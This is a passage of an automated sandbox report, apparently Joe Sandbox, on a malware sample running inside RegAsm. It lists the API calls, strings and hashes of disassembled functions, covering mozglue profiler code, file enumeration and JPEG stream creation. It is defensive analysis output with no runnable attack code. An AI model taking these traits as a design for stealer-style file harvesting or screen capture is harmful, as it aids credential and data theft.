Opcode Fuzzy Hash: 03fee1f8f99065405532b756f30e6c62688974afcd7eea3901a6784b450394b2
Instruction Fuzzy Hash: 1852A571A003199FEF219F24CD84FAAB7BCEB49748F104199FD09A7640DB74AA85CF61

Function 6C2EF070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2EF09B

Part of subcall function 6C2C5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5B85
Part of subcall function 6C2C5B50: EnterCriticalSection.KERNEL32(6C32F688,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5B90
Part of subcall function 6C2C5B50: LeaveCriticalSection.KERNEL32(6C32F688,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5BD8
Part of subcall function 6C2C5B50: GetTickCount64.KERNEL32 ref: 6C2C5BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C2EF0AC

Part of subcall function 6C2C5C50: GetTickCount64.KERNEL32 ref: 6C2C5D40
Part of subcall function 6C2C5C50: EnterCriticalSection.KERNEL32(6C32F688), ref: 6C2C5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C2EF0BE

Part of subcall function 6C2C5C50: __aulldiv.LIBCMT ref: 6C2C5DB4
Part of subcall function 6C2C5C50: LeaveCriticalSection.KERNEL32(6C32F688), ref: 6C2C5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C2EF155
GetCurrentThreadId.KERNEL32 ref: 6C2EF1E0
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF1ED
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF212
GetCurrentThreadId.KERNEL32 ref: 6C2EF229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EF231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2EF248
GetCurrentThreadId.KERNEL32 ref: 6C2EF2AE
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF2BB
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF2F8

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EF350
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF35D
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF381
GetCurrentThreadId.KERNEL32 ref: 6C2EF398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EF3A0
GetCurrentThreadId.KERNEL32 ref: 6C2EF489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EF491

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2EF3CF

Part of subcall function 6C2EF070: GetCurrentThreadId.KERNEL32 ref: 6C2EF440
Part of subcall function 6C2EF070: AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF44D
Part of subcall function 6C2EF070: ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2EF4A8
GetCurrentThreadId.KERNEL32 ref: 6C2EF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EF561
GetCurrentThreadId.KERNEL32 ref: 6C2EF577
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF585
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C2EF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C2EF56A
[I %d/%d] profiler_pause_sampling, xrefs: 6C2EF3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C2EF499

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: bd04796154ec3b979c238c191b68a70c58f5600a430f2db05112d59d804139e7
Instruction ID: 1f17cd109fc66c5ec77ebd52e71d648143a572f58fd8dbfa9522e50ccafe58df
Opcode Fuzzy Hash: bd04796154ec3b979c238c191b68a70c58f5600a430f2db05112d59d804139e7
Instruction Fuzzy Hash: 31D10775A043189FDF009F68E40479AB7BCEF4E328F51461EED5553B80DBB85904CBA2

Function 6C2B64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C2B64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C2B64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C2B6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C2B6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C2B652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C2B671C
GetCurrentProcess.KERNEL32 ref: 6C2B6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C2B672F
GetCurrentProcess.KERNEL32 ref: 6C2B6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C2B6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C2B6A80
GetSystemInfo.KERNEL32(?), ref: 6C2B6ABE
__Init_thread_footer.LIBCMT ref: 6C2B6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2B6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2B6AF7

Strings

nvd3d9wrap.dll, xrefs: 6C2B6500
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C2B6798
_etoured.dll, xrefs: 6C2B64ED
detoured.dll, xrefs: 6C2B64DA
user32.dll, xrefs: 6C2B6526
nvdxgiwrap.dll, xrefs: 6C2B6513

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 5dc4dbd8c9e480d2851fee1a384350c87761cd926a7d004a5a7b6c5ca3d4ae39
Instruction ID: b7a9c83d0cf1cfbcb1cf4690a92302b8f0ada82b78ed3cbc93b870e01c3d5ddf
Opcode Fuzzy Hash: 5dc4dbd8c9e480d2851fee1a384350c87761cd926a7d004a5a7b6c5ca3d4ae39
Instruction Fuzzy Hash: 98F1DF7090162E8FDF24CF24CD88B9AB7B5EF4635DF1442A9EC09A7641D735AA84CF90

Function 004138B0 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004138CC
FindFirstFileA.KERNEL32(?,?), ref: 004138E3
lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
FindClose.KERNEL32(000000FF), ref: 00413C7C

Strings

%s%s, xrefs: 00413AAD
%s\*, xrefs: 004138C0
%s\%s, xrefs: 0041397A
!=A, xrefs: 00413C82, 00413C45, 00413B69, 00413909, 00413B6C, 00413C48
%s\%s\%s, xrefs: 00413A4A
%s\%s, xrefs: 00413A6F

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-817767981
Opcode ID: c160324fee9f290d05effc3aa5b0fa9495973b4ff355d4639833e8346a244a75
Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
Opcode Fuzzy Hash: c160324fee9f290d05effc3aa5b0fa9495973b4ff355d4639833e8346a244a75
Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66

Function 6C2EE2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6C2EE2A6), ref: 6C2EE35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6C2EE2A6), ref: 6C2EE386
GetCurrentThreadId.KERNEL32 ref: 6C2EE3E4
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EE3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6C2EE4AB
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EE4F5
GetCurrentThreadId.KERNEL32 ref: 6C2EE577
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EE584
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C2EE8A6

Part of subcall function 6C2AB7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C2AB7CF
Part of subcall function 6C2AB7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C2AB808

Part of subcall function 6C2FB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6C320FB6,00000000,?,?,6C2EE69E), ref: 6C2FB830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6C2EE6DA

Part of subcall function 6C2FB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6C2FB916
Part of subcall function 6C2FB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6C2FB94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C2EE864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2EE883

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C2EE5A1, 6C2EE5CC, 6C2EE5FF, 6C2EE62A
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C2EE777
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C2EE655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C2EE826, 6C2EE850
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C2EE722, 6C2EE750, 6C2EE7A2

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: 5c723dd8ce739049990663fb28079b7bc6e5889bc36cb1a64fec3b1150beabcc
Instruction ID: f3ee8595e66ef38225ed7d7feeaf7f091ea9b377f4003ecc9aaf11ad6a37ecf7
Opcode Fuzzy Hash: 5c723dd8ce739049990663fb28079b7bc6e5889bc36cb1a64fec3b1150beabcc
Instruction Fuzzy Hash: 3C02AD75A003099FCB10CF28C484AAAB7F5FF89308F55452CE99A9BB50D778E945CF92

Function 00419010 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C

Strings

image/jpeg, xrefs: 00419136

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: d2d97f149455d52a142a4a5a9fee1aff0f128d9dd92e2b14736a525e33f1e636
Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
Opcode Fuzzy Hash: d2d97f149455d52a142a4a5a9fee1aff0f128d9dd92e2b14736a525e33f1e636
Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65

Function 00414570 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
HeapAlloc.KERNEL32(00000000), ref: 00414587
wsprintfA.USER32 ref: 004145A6
FindFirstFileA.KERNEL32(?,?), ref: 004145BD
StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
FindClose.KERNEL32(000000FF), ref: 004146A0
lstrcatA.KERNEL32(?,01343978,?,00000104), ref: 004146C5
lstrcatA.KERNEL32(?,01342400), ref: 004146D8
lstrlenA.KERNEL32(?), ref: 004146E5
lstrlenA.KERNEL32(?), ref: 004146F6

Strings

%s\*, xrefs: 0041459A
%s\%s, xrefs: 0041461B

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 419923a9e08405b21d936003359c3c873ff73b1994b3a3dbc6781c2d7c9f8699
Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
Opcode Fuzzy Hash: 419923a9e08405b21d936003359c3c873ff73b1994b3a3dbc6781c2d7c9f8699
Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96

Function 6C2B7810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32E744), ref: 6C2B7885
LeaveCriticalSection.KERNEL32(6C32E744), ref: 6C2B78A5
EnterCriticalSection.KERNEL32(6C32E784), ref: 6C2B78AD
LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2B78CD
EnterCriticalSection.KERNEL32(6C32E7DC), ref: 6C2B78D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C2B78E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C2B795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C2B79BB
LeaveCriticalSection.KERNEL32(?), ref: 6C2B7BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C2B7C82
LeaveCriticalSection.KERNEL32(6C32E7DC), ref: 6C2B7CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C2B7DAF

Strings

D2l, xrefs: 6C2B787F
D2l, xrefs: 6C2B789F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID: D2l$D2l
API String ID: 759993129-1558559036
Opcode ID: 7c6616cb95005bbb33e1ec49f842ac2c93aa70a26ba69dd7595580ea5ecb74ff
Instruction ID: 6fa66d13b04267f684ec01e790a476a0f966ddcb6ece17ef25776d6d9204c38f
Opcode Fuzzy Hash: 7c6616cb95005bbb33e1ec49f842ac2c93aa70a26ba69dd7595580ea5ecb74ff
Instruction Fuzzy Hash: A3026E31A0121A8FDB54CF29C984799B7B5FF88758F2582AADC09A7711D734BE90CF90

Function 6C2E7E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

v2l, xrefs: 6C2E8207
(pre-xul), xrefs: 6C2E7E88
data, xrefs: 6C2E8280, 6C2E83E1
schema, xrefs: 6C2E81E3, 6C2E8311
name, xrefs: 6C2E7ECF, 6C2E8335

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$v2l
API String ID: 3412268980-2115466017
Opcode ID: 34f68c798404ccbf60d1177bcaae2240528ced82216607c8aa63b2e79c55cdbd
Instruction ID: 5e0e25ebe004a3788608ac1e10be7573d9fcf8e0183a6d4e8a7a5f22109b6b14
Opcode Fuzzy Hash: 34f68c798404ccbf60d1177bcaae2240528ced82216607c8aa63b2e79c55cdbd
Instruction Fuzzy Hash: 2FE1A0B5A043448FC710CF68C84065BF7E9BF89308F148A2DE999E7780DB75ED098B91

Function 6C2CD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C2DD1C5), ref: 6C2CD4F2
LeaveCriticalSection.KERNEL32(6C32E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C2DD1C5), ref: 6C2CD50B

Part of subcall function 6C2ACFE0: EnterCriticalSection.KERNEL32(6C32E784), ref: 6C2ACFF6
Part of subcall function 6C2ACFE0: LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2AD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C2DD1C5), ref: 6C2CD52E
EnterCriticalSection.KERNEL32(6C32E7DC), ref: 6C2CD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C2CD6A6
LeaveCriticalSection.KERNEL32(6C32E7DC), ref: 6C2CD712
LeaveCriticalSection.KERNEL32(6C32E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C2DD1C5), ref: 6C2CD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C2CD7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C2CD82C
<jemalloc>, xrefs: 6C2CD827

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 4be8e684becd02707c9edd2796fdd0b64ad068285495c3468023e2d1b7e3cd8b
Instruction ID: 079b37502e222b9f16900141f5ca1b7f4771c1556edbaa9d5db940aeb5513fe5
Opcode Fuzzy Hash: 4be8e684becd02707c9edd2796fdd0b64ad068285495c3468023e2d1b7e3cd8b
Instruction Fuzzy Hash: 4991D371B447098FDB54CF38C49072AB7E5FB89315F254A2EE99AC7A80D734E845CB82

